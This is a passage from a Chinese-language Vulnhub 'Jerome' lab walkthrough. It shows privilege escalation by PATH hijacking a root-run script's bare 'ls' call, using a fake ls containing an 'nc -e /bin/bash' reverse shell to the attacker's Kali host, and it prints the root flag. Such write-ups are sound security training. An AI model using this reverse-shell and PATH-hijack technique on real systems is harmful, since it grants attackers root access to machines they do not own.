ls -alh /usr/share/simulate.sh
-rwxr-xr-x 1 root root 130 Apr 16 2019 /usr/share/simulate.sh
由于simulate.sh脚本会执行一些命令,比如ls,而且不是绝对路径,因此可以生成我们自己的ls命令(也就是反向shell),然后追加到PATH变量中:
jerome@jerome:/home/jerome$ ls
ls
flag.txt
jerome@jerome:/home/jerome$ ls -alh
ls -alh
total 36K
drwxr-xr-x 4 jerome jerome 4.0K Dec 31 06:07 .
drwxr-xr-x 3 root root 4.0K Apr 16 2019 ..
-rw------- 1 jerome jerome 531 Dec 31 06:07 .bash_history
-rw-r--r-- 1 jerome jerome 220 Apr 16 2019 .bash_logout
-rw-r--r-- 1 jerome jerome 3.7K Apr 16 2019 .bashrc
drwx------ 2 jerome jerome 4.0K Apr 16 2019 .cache
drwxrwxr-x 3 jerome jerome 4.0K Apr 16 2019 .local
-rw-r--r-- 1 jerome jerome 807 Apr 16 2019 .profile
-rw-r--r-- 1 jerome jerome 0 Apr 16 2019 .sudo_as_admin_successful
-rw-r--r-- 1 1001 1001 12 Apr 12 2019 flag.txt
jerome@jerome:/home/jerome$ echo "nc -e /bin/bash 192.168.56.206 9999" >> ls
echo "nc -e /bin/bash 192.168.56.206 9999" >> ls
jerome@jerome:/home/jerome$ chmod 777
chmod 777
chmod: missing operand after '777'
Try 'chmod --help' for more information.
jerome@jerome:/home/jerome$ chmod 777 ls
chmod 777 ls
jerome@jerome:/home/jerome$
mp:$PATH
成功在kali linux得到root用户反弹回来的shell
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ sudo nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.219] 39892
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 36K
drwx------ 3 root root 4.0K Apr 20 2019 .
drwxr-xr-x 22 root root 4.0K Mar 31 2019 ..
-rw------- 1 root root 607 Apr 20 2019 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 13 2019 .bashrc
-rw------- 1 root root 11 Apr 12 2019 flag.txt
drwxr-xr-x 3 root root 4.0K Mar 31 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 12 Apr 20 2019 .python_history
-rw-r--r-- 1 root root 66 Apr 3 2019 .selected_editor
cat flag.txt
f60532cf8a
经验教训
-
metasploit中对proxies的设置不是url,而是type:host:port, 中间没有//
-
当root权限的脚本中有执行命令,而且该命令不是绝对路径,可以通过生成同名的命令,其实是反弹shell的命令。
-
metasploit中如果RHOSTS是本地,不要设置成localhost,而是127.0.0.1,。